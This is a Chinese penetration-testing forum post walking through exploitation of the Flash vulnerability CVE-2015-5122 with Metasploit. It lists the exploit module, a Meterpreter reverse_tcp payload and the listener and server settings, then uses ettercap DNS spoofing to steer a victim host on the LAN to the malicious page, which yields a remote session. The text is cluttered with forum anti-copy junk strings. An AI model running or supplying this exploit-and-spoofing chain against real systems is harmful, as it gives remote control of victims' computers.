中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

( O$ {6 p" A" u/ p: @ ? 二、cve2015-5122漏洞实例演示虚拟机 7 s) m/ w: H4 G7 s

' j( m% ^+ \6 _0 x( x& G6 N

5 |5 S: j6 N: n L! L |   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ! l: ]+ e9 { w1 s# h# E$ T

8 v) b1 X- u: J7 b# H

! {0 _8 |5 F1 l5 O8 ~. F3 A search cve-2015-5122如图: 9 X8 V4 A& I* p

* M- ~/ b" `0 W7 H, J

' C: `% }, B# t" ]) Z) U   - e$ q0 W6 A- \9 k1 E

4 j4 D! k0 e+ R" G! S

+ o, v6 x! O* ^4 _) T 下面我们敲如下命令: 2 o8 V' d% X$ K: z9 F3 D7 H+ p" R

3 R0 Q4 e! C5 N0 ^& s' Q* L: ~

3 }" p: }' a, T7 c$ y use exploit/multi/browser/adobe_flash_opaque_background_uaf 2 }# y4 u' u! R" m3 R

, n9 ^) y; P, @6 l: ]: v

, x/ _2 L( b) v- j2 m2 \" |: y- d set PAYLOAD windows/meterpreter/reverse_tcp * Z) S* m. C& P7 N8 v

* e/ j9 I2 g" v3 _) n

. _- |" M8 B$ r set LHOST 192.168.0.109 $ ?/ l6 B& I/ |3 m/ J9 t9 ?$ B

" g- q3 P8 t/ |

# d; Q; D" O5 N& }1 _ set URIPATH /                        /*根目录*/ $ i' x% q- o7 u$ e# S7 T6 P7 S

+ z& \' v, F% k# E. d) D0 _

B# j- d% D8 z, E1 y set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 + k" X; Q' q1 @1 s# a

* U/ n3 |. M/ D I% G$ _4 u

# p3 w) i( ]3 g- t# P set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' D. f0 {4 \7 q9 I0 M

, z- c# N" U! X: e2 `, a6 x

: s8 ^- V% z2 l3 w3 [ 然后show options如图: , [: v1 }' Y5 v5 b

) M" S+ k& F/ \" v7 G9 x

- T( ]8 m, H, Q. A# P   6 o( T5 u! K1 X/ M5 U$ _

* d$ k0 S- J; j1 u

5 {- |7 e" b# S5 {6 } 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
7 p9 A* h/ s$ `0 u7 k* d
. H& q; u7 M9 M+ v3 l C* t

6 Y) e* [% [/ d

5 r( y6 ` s2 a+ S 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 - x; x" G; a( A9 Y( b2 ~0 p/ B' n

; M- k4 M( ~/ f* \

T( S4 Q" G( h6 H* p Y Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf $ u) v# c- o7 q8 D+ r# b0 p% m

* d. ~$ Y( M. |

" U. c8 b4 P/ W0 i- } [( \   $ h7 z. ?4 U; m

1 K9 m1 R/ [+ r2 J T

9 x) }; D9 t v/ F8 { 成功了,这时候我们断开ettercap,如图: 4 m0 h2 z/ |9 F, h8 X8 Y0 a

# r3 D! o" V4 a6 v5 @7 ~

; `4 ]: l7 Q$ k1 _! l& t# N   + A9 m# ^& `. k+ C( K1 \& _ E' r3 V

0 S, L6 Q4 i. e0 @" e* Y9 [

' D$ j' q b& I1 s9 F* I5 h Screenshot如图: ' z/ z4 J7 C4 E `4 c# w; s

0 e! B) ^! V* }+ J( |: G

/ A, F2 A" t2 V) i" e% j: p   $ y4 L2 ?' X$ \ M( C+ [- G% i

+ f! F5 p) f6 m" O9 p

2 O1 v0 t3 G! f+ k v7 R 4 @# |- `6 }( S: B- O. r: L" k2 p- W






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2